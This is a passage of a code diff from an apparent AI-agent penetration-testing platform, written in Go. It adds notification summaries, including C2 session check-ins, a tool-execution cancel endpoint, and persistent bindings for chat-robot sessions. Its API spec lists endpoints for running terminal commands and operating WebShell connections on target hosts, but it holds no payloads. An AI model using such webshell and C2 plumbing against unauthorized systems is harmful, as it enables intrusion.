VALUES(?, CURRENT_TIMESTAMP)
ON CONFLICT(event_id) DO UPDATE SET read_at = CURRENT_TIMESTAMP
`)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare statement"})
return
}
defer stmt.Close()
marked := 0
for _, raw := range req.EventIDs {
id, ok := normalizeMarkableEventID(raw)
if !ok {
continue
}
if _, err := stmt.Exec(id); err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to mark read"})
return
}
marked++
}
if err := tx.Commit(); err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to commit read marks"})
return
}
if err := pruneNotificationReads(h.db, notificationReadMaxRows); err != nil {
h.logger.Warn("裁剪通知已读记录失败", zap.Error(err))
}
c.JSON(http.StatusOK, gin.H{"ok": true, "marked": marked})
}
// GetSummary 返回通知聚合视图(用于头部铃铛)
func (h *NotificationHandler) GetSummary(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
return
}
if err := createNotificationReadTableIfNeeded(h.db); err != nil {
h.logger.Warn("初始化通知已读表失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to initialize notification read table"})
return
}
english := requestWantsEnglish(c)
sinceMs := normalizeSinceMs(parseSinceMs(c.Query("since")))
limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("limit", "50")))
if limit <= 0 {
limit = 50
}
if limit > 200 {
limit = 200
}
hitlItems, err := h.loadPendingHITLItems(limit, english)
if err != nil {
h.logger.Warn("加载 HITL 通知失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize hitl notifications"})
return
}
vulnItems, vulnCounts, err := h.loadVulnerabilityItems(sinceMs, limit, english)
if err != nil {
h.logger.Warn("加载漏洞通知失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize vulnerabilities"})
return
}
c2OnlineItems, c2OnlineCount, err := h.loadC2SessionOnlineEvents(sinceMs, limit, english)
if err != nil {
h.logger.Warn("加载 C2 会话上线通知失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize c2 session events"})
return
}
longRunningItems, longRunningCount := h.summarizeLongRunningTasks(15*time.Minute, english)
completedItems, completedCount := h.summarizeCompletedTasksSince(sinceMs, limit, english)
items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(c2OnlineItems)+len(longRunningItems)+len(completedItems))
items = append(items, hitlItems...)
items = append(items, vulnItems...)
items = append(items, c2OnlineItems...)
items = append(items, longRunningItems...)
items = append(items, completedItems...)
items, err = h.applyReadStates(items)
if err != nil {
h.logger.Warn("加载通知已读状态失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to load notification read states"})
return
}
items = filterVisibleItems(items)
sort.Slice(items, func(i, j int) bool {
ti, errI := time.Parse(time.RFC3339, items[i].Ts)
tj, errJ := time.Parse(time.RFC3339, items[j].Ts)
if errI != nil || errJ != nil {
return i < j
}
return ti.After(tj)
})
p0Count := countP0(items)
unreadCount := countUnread(items)
c.JSON(http.StatusOK, NotificationSummaryResponse{
SinceMs: sinceMs,
GeneratedAt: time.Now().UTC().Format(time.RFC3339),
P0Count: p0Count,
UnreadCount: unreadCount,
Counts: map[string]int{
"hitlPending": len(hitlItems),
"newCriticalVulns": vulnCounts["newCriticalVulns"],
"newHighVulns": vulnCounts["newHighVulns"],
"newMediumVulns": vulnCounts["newMediumVulns"],
"newLowVulns": vulnCounts["newLowVulns"],
"newInfoVulns": vulnCounts["newInfoVulns"],
"failedExecutions": 0,
"longRunningTasks": longRunningCount,
"completedTasks": completedCount,
"c2SessionOnline": c2OnlineCount,
},
Items: items,
})
}
+84 -27
View File
@@ -461,6 +461,14 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"type": "string", "type": "string",
"description": "对话ID", "description": "对话ID",
}, },
"reason": map[string]interface{}{
"type": "string",
"description": "可选。与 MCP 监控页「终止并说明」一致:非空时合并进当前工具返回给模型的文本(含 USER INTERRUPT NOTE 块)",
},
"continueAfter": map[string]interface{}{
"type": "boolean",
"description": "为 true 时仅终止当前进行中的 MCP 工具调用(不取消整轮任务);须已有工具在执行,否则 400",
},
}, },
}, },
"AgentTask": map[string]interface{}{ "AgentTask": map[string]interface{}{
@@ -3318,6 +3326,55 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
}, },
}, },
}, },
"/api/monitor/execution/{id}/cancel": map[string]interface{}{
"post": map[string]interface{}{
"tags": []string{"监控"},
"summary": "取消进行中的工具执行",
"description": "对当前进程内正在执行的 MCP 工具调用发送 context 取消信号;上层对话/多步任务可继续。若执行已结束或未在本进程内运行则返回 404。",
"operationId": "cancelExecution",
"parameters": []map[string]interface{}{
{
"name": "id",
"in": "path",
"required": true,
"description": "执行ID",
"schema": map[string]interface{}{
"type": "string",
},
},
},
"requestBody": map[string]interface{}{
"required": false,
"content": map[string]interface{}{
"application/json": map[string]interface{}{
"schema": map[string]interface{}{
"type": "object",
"properties": map[string]interface{}{
"note": map[string]interface{}{
"type": "string",
"description": "可选。非空时与工具已返回输出合并交给大模型,并带有「用户终止说明」标题块以便与命令行原文区分",
},
},
},
},
},
},
"responses": map[string]interface{}{
"200": map[string]interface{}{
"description": "已发送终止信号",
},
"400": map[string]interface{}{
"description": "请求体不是合法 JSON",
},
"404": map[string]interface{}{
"description": "未找到进行中的工具执行",
},
"401": map[string]interface{}{
"description": "未授权",
},
},
},
},
"/api/monitor/executions": map[string]interface{}{ "/api/monitor/executions": map[string]interface{}{
"delete": map[string]interface{}{ "delete": map[string]interface{}{
"tags": []string{"监控"}, "tags": []string{"监控"},
@@ -4445,7 +4502,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"messageId"}, "required": []string{"messageId"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"messageId": map[string]interface{}{ "messageId": map[string]interface{}{
@@ -4689,7 +4746,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"scheduleEnabled"}, "required": []string{"scheduleEnabled"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"scheduleEnabled": map[string]interface{}{"type": "boolean", "description": "是否启用自动调度"}, "scheduleEnabled": map[string]interface{}{"type": "boolean", "description": "是否启用自动调度"},
@@ -4761,7 +4818,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"query"}, "required": []string{"query"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"query": map[string]interface{}{"type": "string", "description": "FOFA查询语法", "example": "domain=\"example.com\""}, "query": map[string]interface{}{"type": "string", "description": "FOFA查询语法", "example": "domain=\"example.com\""},
@@ -4810,7 +4867,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"text"}, "required": []string{"text"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"text": map[string]interface{}{"type": "string", "description": "自然语言描述", "example": "查找使用WordPress的网站"}, "text": map[string]interface{}{"type": "string", "description": "自然语言描述", "example": "查找使用WordPress的网站"},
@@ -4853,7 +4910,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"api_key", "model"}, "required": []string{"api_key", "model"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"provider": map[string]interface{}{"type": "string", "description": "LLM提供商(openai/claude", "example": "openai"}, "provider": map[string]interface{}{"type": "string", "description": "LLM提供商(openai/claude", "example": "openai"},
@@ -4900,7 +4957,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"command"}, "required": []string{"command"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"command": map[string]interface{}{"type": "string", "description": "要执行的命令"}, "command": map[string]interface{}{"type": "string", "description": "要执行的命令"},
@@ -4943,7 +5000,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"command"}, "required": []string{"command"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"command": map[string]interface{}{"type": "string", "description": "要执行的命令"}, "command": map[string]interface{}{"type": "string", "description": "要执行的命令"},
@@ -5027,7 +5084,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"url"}, "required": []string{"url"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, "url": map[string]interface{}{"type": "string", "description": "WebShell URL"},
@@ -5231,7 +5288,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"url", "command"}, "required": []string{"url", "command"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, "url": map[string]interface{}{"type": "string", "description": "WebShell URL"},
@@ -5277,7 +5334,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"url", "action", "path"}, "required": []string{"url", "action", "path"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, "url": map[string]interface{}{"type": "string", "description": "WebShell URL"},
@@ -5339,14 +5396,14 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"items": map[string]interface{}{ "items": map[string]interface{}{
"type": "object", "type": "object",
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"relativePath": map[string]interface{}{"type": "string"}, "relativePath": map[string]interface{}{"type": "string"},
"absolutePath": map[string]interface{}{"type": "string"}, "absolutePath": map[string]interface{}{"type": "string"},
"name": map[string]interface{}{"type": "string"}, "name": map[string]interface{}{"type": "string"},
"size": map[string]interface{}{"type": "integer"}, "size": map[string]interface{}{"type": "integer"},
"modifiedUnix": map[string]interface{}{"type": "integer"}, "modifiedUnix": map[string]interface{}{"type": "integer"},
"date": map[string]interface{}{"type": "string"}, "date": map[string]interface{}{"type": "string"},
"conversationId": map[string]interface{}{"type": "string"}, "conversationId": map[string]interface{}{"type": "string"},
"subPath": map[string]interface{}{"type": "string"}, "subPath": map[string]interface{}{"type": "string"},
}, },
}, },
}, },
@@ -5369,7 +5426,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"multipart/form-data": map[string]interface{}{ "multipart/form-data": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"file"}, "required": []string{"file"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"file": map[string]interface{}{"type": "string", "format": "binary", "description": "上传的文件"}, "file": map[string]interface{}{"type": "string", "format": "binary", "description": "上传的文件"},
@@ -5410,7 +5467,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"path"}, "required": []string{"path"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, "path": map[string]interface{}{"type": "string", "description": "文件相对路径"},
@@ -5485,7 +5542,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"path", "content"}, "required": []string{"path", "content"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, "path": map[string]interface{}{"type": "string", "description": "文件相对路径"},
@@ -5512,7 +5569,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"name"}, "required": []string{"name"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"parent": map[string]interface{}{"type": "string", "description": "父目录相对路径"}, "parent": map[string]interface{}{"type": "string", "description": "父目录相对路径"},
@@ -5552,7 +5609,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"path", "newName"}, "required": []string{"path", "newName"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"path": map[string]interface{}{"type": "string", "description": "当前文件相对路径"}, "path": map[string]interface{}{"type": "string", "description": "当前文件相对路径"},
@@ -5646,7 +5703,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"platform", "text"}, "required": []string{"platform", "text"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"platform": map[string]interface{}{"type": "string", "description": "平台类型", "enum": []string{"dingtalk", "lark", "wecom"}}, "platform": map[string]interface{}{"type": "string", "description": "平台类型", "enum": []string{"dingtalk", "lark", "wecom"}},
@@ -5712,7 +5769,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"name"}, "required": []string{"name"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"filename": map[string]interface{}{"type": "string", "description": "文件名(可选,自动生成)"}, "filename": map[string]interface{}{"type": "string", "description": "文件名(可选,自动生成)"},
@@ -5932,7 +5989,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"path"}, "required": []string{"path"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, "path": map[string]interface{}{"type": "string", "description": "文件相对路径"},
@@ -5974,7 +6031,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"content": map[string]interface{}{ "content": map[string]interface{}{
"application/json": map[string]interface{}{ "application/json": map[string]interface{}{
"schema": map[string]interface{}{ "schema": map[string]interface{}{
"type": "object", "type": "object",
"required": []string{"ids"}, "required": []string{"ids"},
"properties": map[string]interface{}{ "properties": map[string]interface{}{
"ids": map[string]interface{}{ "ids": map[string]interface{}{
@@ -6197,7 +6254,7 @@ func (h *OpenAPIHandler) GetConversationResults(c *gin.Context) {
} }
// 获取漏洞列表 // 获取漏洞列表
vulnList, err := h.db.ListVulnerabilities(1000, 0, "", conversationID, "", "") vulnList, err := h.db.ListVulnerabilities(1000, 0, database.VulnerabilityListFilter{ConversationID: conversationID})
if err != nil { if err != nil {
h.logger.Warn("获取漏洞列表失败", zap.Error(err)) h.logger.Warn("获取漏洞列表失败", zap.Error(err))
vulnList = []*database.Vulnerability{} vulnList = []*database.Vulnerability{}
+6 -6
View File
@@ -26,7 +26,7 @@ var apiDocI18nSummaryToKey = map[string]string{
"创建分组": "createGroup", "列出分组": "listGroups", "获取分组": "getGroup", "更新分组": "updateGroup", "创建分组": "createGroup", "列出分组": "listGroups", "获取分组": "getGroup", "更新分组": "updateGroup",
"删除分组": "deleteGroup", "获取分组中的对话": "getGroupConversations", "添加对话到分组": "addConversationToGroup", "删除分组": "deleteGroup", "获取分组中的对话": "getGroupConversations", "添加对话到分组": "addConversationToGroup",
"从分组移除对话": "removeConversationFromGroup", "从分组移除对话": "removeConversationFromGroup",
"列出漏洞": "listVulnerabilities", "创建漏洞": "createVulnerability", "获取漏洞统计": "getVulnerabilityStats", "列出漏洞": "listVulnerabilities", "创建漏洞": "createVulnerability", "获取漏洞统计": "getVulnerabilityStats",
"获取漏洞": "getVulnerability", "更新漏洞": "updateVulnerability", "删除漏洞": "deleteVulnerability", "获取漏洞": "getVulnerability", "更新漏洞": "updateVulnerability", "删除漏洞": "deleteVulnerability",
"列出角色": "listRoles", "创建角色": "createRole", "获取角色": "getRole", "更新角色": "updateRole", "删除角色": "deleteRole", "列出角色": "listRoles", "创建角色": "createRole", "获取角色": "getRole", "更新角色": "updateRole", "删除角色": "deleteRole",
"获取可用Skills列表": "getAvailableSkills", "列出Skills": "listSkills", "创建Skill": "createSkill", "获取可用Skills列表": "getAvailableSkills", "列出Skills": "listSkills", "创建Skill": "createSkill",
@@ -52,9 +52,9 @@ var apiDocI18nSummaryToKey = map[string]string{
"重跑批量任务队列": "rerunBatchQueue", "修改队列元数据": "updateBatchQueueMetadata", "重跑批量任务队列": "rerunBatchQueue", "修改队列元数据": "updateBatchQueueMetadata",
"修改队列调度配置": "updateBatchQueueSchedule", "开关Cron自动调度": "setBatchQueueScheduleEnabled", "修改队列调度配置": "updateBatchQueueSchedule", "开关Cron自动调度": "setBatchQueueScheduleEnabled",
"获取所有分组映射": "getAllGroupMappings", "获取所有分组映射": "getAllGroupMappings",
"FOFA搜索": "fofaSearch", "自然语言解析为FOFA语法": "fofaParse", "FOFA搜索": "fofaSearch", "自然语言解析为FOFA语法": "fofaParse",
"测试OpenAI API连接": "testOpenAI", "测试OpenAI API连接": "testOpenAI",
"执行终端命令": "terminalRun", "流式执行终端命令": "terminalRunStream", "WebSocket终端": "terminalWS", "执行终端命令": "terminalRun", "流式执行终端命令": "terminalRunStream", "WebSocket终端": "terminalWS",
"列出WebShell连接": "listWebshellConnections", "创建WebShell连接": "createWebshellConnection", "列出WebShell连接": "listWebshellConnections", "创建WebShell连接": "createWebshellConnection",
"更新WebShell连接": "updateWebshellConnection", "删除WebShell连接": "deleteWebshellConnection", "更新WebShell连接": "updateWebshellConnection", "删除WebShell连接": "deleteWebshellConnection",
"获取连接状态": "getWebshellConnectionState", "保存连接状态": "saveWebshellConnectionState", "获取连接状态": "getWebshellConnectionState", "保存连接状态": "saveWebshellConnectionState",
@@ -69,7 +69,7 @@ var apiDocI18nSummaryToKey = map[string]string{
"获取Markdown代理详情": "getMarkdownAgent", "更新Markdown代理": "updateMarkdownAgent", "删除Markdown代理": "deleteMarkdownAgent", "获取Markdown代理详情": "getMarkdownAgent", "更新Markdown代理": "updateMarkdownAgent", "删除Markdown代理": "deleteMarkdownAgent",
"列出技能包文件": "listSkillPackageFiles", "获取技能包文件内容": "getSkillPackageFile", "写入技能包文件": "putSkillPackageFile", "列出技能包文件": "listSkillPackageFiles", "获取技能包文件内容": "getSkillPackageFile", "写入技能包文件": "putSkillPackageFile",
"批量获取工具名称": "batchGetToolNames", "批量获取工具名称": "batchGetToolNames",
"获取知识库统计": "getKnowledgeStats", "获取知识库统计": "getKnowledgeStats",
} }
var apiDocI18nResponseDescToKey = map[string]string{ var apiDocI18nResponseDescToKey = map[string]string{
@@ -78,7 +78,7 @@ var apiDocI18nResponseDescToKey = map[string]string{
"对话不存在或结果不存在": "conversationOrResultNotFound", "请求参数错误(如task为空)": "badRequestTaskEmpty", "对话不存在或结果不存在": "conversationOrResultNotFound", "请求参数错误(如task为空)": "badRequestTaskEmpty",
"请求参数错误或分组名称已存在": "badRequestGroupNameExists", "分组不存在": "groupNotFound", "请求参数错误或分组名称已存在": "badRequestGroupNameExists", "分组不存在": "groupNotFound",
"请求参数错误(如配置格式不正确、缺少必需字段等)": "badRequestConfig", "请求参数错误(如配置格式不正确、缺少必需字段等)": "badRequestConfig",
"请求参数错误(如query为空)": "badRequestQueryEmpty", "方法不允许(仅支持POST请求)": "methodNotAllowed", "请求参数错误(如query为空)": "badRequestQueryEmpty", "方法不允许(仅支持POST请求)": "methodNotAllowed",
"登录成功": "loginSuccess", "密码错误": "invalidPassword", "登出成功": "logoutSuccess", "登录成功": "loginSuccess", "密码错误": "invalidPassword", "登出成功": "logoutSuccess",
"密码修改成功": "passwordChanged", "Token有效": "tokenValid", "Token无效或已过期": "tokenInvalid", "密码修改成功": "passwordChanged", "Token有效": "tokenValid", "Token无效或已过期": "tokenInvalid",
"对话创建成功": "conversationCreated", "服务器内部错误": "internalError", "更新成功": "updateSuccess", "对话创建成功": "conversationCreated", "服务器内部错误": "internalError", "更新成功": "updateSuccess",
@@ -89,7 +89,7 @@ var apiDocI18nResponseDescToKey = map[string]string{
"消息发送成功,返回AI回复": "messageSent", "流式响应(Server-Sent Events": "streamResponse", "消息发送成功,返回AI回复": "messageSent", "流式响应(Server-Sent Events": "streamResponse",
// 新增缺失端点响应 // 新增缺失端点响应
"参数错误或删除失败": "badRequestOrDeleteFailed", "参数错误或删除失败": "badRequestOrDeleteFailed",
"参数错误": "paramError", "仅已完成或已取消的队列可以重跑": "onlyCompletedOrCancelledCanRerun", "参数错误": "paramError", "仅已完成或已取消的队列可以重跑": "onlyCompletedOrCancelledCanRerun",
"参数错误或队列正在运行中": "badRequestOrQueueRunning", "设置成功": "setSuccess", "参数错误或队列正在运行中": "badRequestOrQueueRunning", "设置成功": "setSuccess",
"搜索成功": "searchSuccess", "解析成功": "parseSuccess", "测试结果": "testResult", "搜索成功": "searchSuccess", "解析成功": "parseSuccess", "测试结果": "testResult",
"执行完成": "executionDone", "SSE事件流": "sseEventStream", "WebSocket连接已建立": "wsEstablished", "执行完成": "executionDone", "SSE事件流": "sseEventStream", "WebSocket连接已建立": "wsEstablished",
+116 -29
View File
@@ -28,20 +28,20 @@ import (
) )
const ( const (
robotCmdHelp = "帮助" robotCmdHelp = "帮助"
robotCmdList = "列表" robotCmdList = "列表"
robotCmdListAlt = "对话列表" robotCmdListAlt = "对话列表"
robotCmdSwitch = "切换" robotCmdSwitch = "切换"
robotCmdContinue = "继续" robotCmdContinue = "继续"
robotCmdNew = "新对话" robotCmdNew = "新对话"
robotCmdClear = "清空" robotCmdClear = "清空"
robotCmdCurrent = "当前" robotCmdCurrent = "当前"
robotCmdStop = "停止" robotCmdStop = "停止"
robotCmdRoles = "角色" robotCmdRoles = "角色"
robotCmdRolesList = "角色列表" robotCmdRolesList = "角色列表"
robotCmdSwitchRole = "切换角色" robotCmdSwitchRole = "切换角色"
robotCmdDelete = "删除" robotCmdDelete = "删除"
robotCmdVersion = "版本" robotCmdVersion = "版本"
) )
// RobotHandler 企业微信/钉钉/飞书等机器人回调处理 // RobotHandler 企业微信/钉钉/飞书等机器人回调处理
@@ -75,61 +75,120 @@ func (h *RobotHandler) sessionKey(platform, userID string) string {
return platform + "_" + userID return platform + "_" + userID
} }
func (h *RobotHandler) loadSessionBinding(sk string) (convID, role string) {
if h.db == nil || strings.TrimSpace(sk) == "" {
return "", ""
}
binding, err := h.db.GetRobotSessionBinding(sk)
if err != nil {
h.logger.Warn("读取机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
return "", ""
}
if binding == nil {
return "", ""
}
return binding.ConversationID, binding.RoleName
}
func (h *RobotHandler) persistSessionBinding(sk, convID, role string) {
if h.db == nil || strings.TrimSpace(sk) == "" || strings.TrimSpace(convID) == "" {
return
}
if err := h.db.UpsertRobotSessionBinding(sk, convID, role); err != nil {
h.logger.Warn("写入机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
}
}
func (h *RobotHandler) deleteSessionBinding(sk string) {
if h.db == nil || strings.TrimSpace(sk) == "" {
return
}
if err := h.db.DeleteRobotSessionBinding(sk); err != nil {
h.logger.Warn("删除机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
}
}
// getOrCreateConversation 获取或创建当前会话,title 用于新对话的标题(取用户首条消息前50字) // getOrCreateConversation 获取或创建当前会话,title 用于新对话的标题(取用户首条消息前50字)
func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (convID string, isNew bool) { func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (convID string, isNew bool) {
sk := h.sessionKey(platform, userID)
h.mu.RLock() h.mu.RLock()
convID = h.sessions[h.sessionKey(platform, userID)] convID = h.sessions[sk]
h.mu.RUnlock() h.mu.RUnlock()
if convID != "" { if convID != "" {
return convID, false return convID, false
} }
if persistedConvID, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedConvID) != "" {
// 会话绑定持久化:服务重启后也可恢复当前对话和角色。
h.mu.Lock()
h.sessions[sk] = persistedConvID
if strings.TrimSpace(persistedRole) != "" {
h.sessionRoles[sk] = persistedRole
}
h.mu.Unlock()
return persistedConvID, false
}
t := strings.TrimSpace(title) t := strings.TrimSpace(title)
if t == "" { if t == "" {
t = "新对话 " + time.Now().Format("01-02 15:04") t = "新对话 " + time.Now().Format("01-02 15:04")
} else { } else {
t = safeTruncateString(t, 50) t = safeTruncateString(t, 50)
} }
conv, err := h.db.CreateConversation(t) conv, err := h.db.CreateConversation(t, database.ConversationCreateMeta{Source: "robot:" + platform})
if err != nil { if err != nil {
h.logger.Warn("创建机器人会话失败", zap.Error(err)) h.logger.Warn("创建机器人会话失败", zap.Error(err))
return "", false return "", false
} }
convID = conv.ID convID = conv.ID
h.mu.Lock() h.mu.Lock()
h.sessions[h.sessionKey(platform, userID)] = convID role := h.sessionRoles[sk]
h.sessions[sk] = convID
h.mu.Unlock() h.mu.Unlock()
h.persistSessionBinding(sk, convID, role)
return convID, true return convID, true
} }
// setConversation 切换当前会话 // setConversation 切换当前会话
func (h *RobotHandler) setConversation(platform, userID, convID string) { func (h *RobotHandler) setConversation(platform, userID, convID string) {
sk := h.sessionKey(platform, userID)
h.mu.Lock() h.mu.Lock()
h.sessions[h.sessionKey(platform, userID)] = convID role := h.sessionRoles[sk]
h.sessions[sk] = convID
h.mu.Unlock() h.mu.Unlock()
h.persistSessionBinding(sk, convID, role)
} }
// getRole 获取当前用户使用的角色,未设置时返回"默认" // getRole 获取当前用户使用的角色,未设置时返回"默认"
func (h *RobotHandler) getRole(platform, userID string) string { func (h *RobotHandler) getRole(platform, userID string) string {
sk := h.sessionKey(platform, userID)
h.mu.RLock() h.mu.RLock()
role := h.sessionRoles[h.sessionKey(platform, userID)] role := h.sessionRoles[sk]
h.mu.RUnlock() h.mu.RUnlock()
if role == "" { if strings.TrimSpace(role) != "" {
return "默认" return role
} }
return role if _, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedRole) != "" {
h.mu.Lock()
h.sessionRoles[sk] = persistedRole
h.mu.Unlock()
return persistedRole
}
return "默认"
} }
// setRole 设置当前用户使用的角色 // setRole 设置当前用户使用的角色
func (h *RobotHandler) setRole(platform, userID, roleName string) { func (h *RobotHandler) setRole(platform, userID, roleName string) {
sk := h.sessionKey(platform, userID)
h.mu.Lock() h.mu.Lock()
h.sessionRoles[h.sessionKey(platform, userID)] = roleName h.sessionRoles[sk] = roleName
convID := h.sessions[sk]
h.mu.Unlock() h.mu.Unlock()
h.persistSessionBinding(sk, convID, roleName)
} }
// clearConversation 清空当前会话(切换到新对话) // clearConversation 清空当前会话(切换到新对话)
func (h *RobotHandler) clearConversation(platform, userID string) (newConvID string) { func (h *RobotHandler) clearConversation(platform, userID string) (newConvID string) {
title := "新对话 " + time.Now().Format("01-02 15:04") title := "新对话 " + time.Now().Format("01-02 15:04")
conv, err := h.db.CreateConversation(title) conv, err := h.db.CreateConversation(title, database.ConversationCreateMeta{Source: "robot:" + platform + ":new"})
if err != nil { if err != nil {
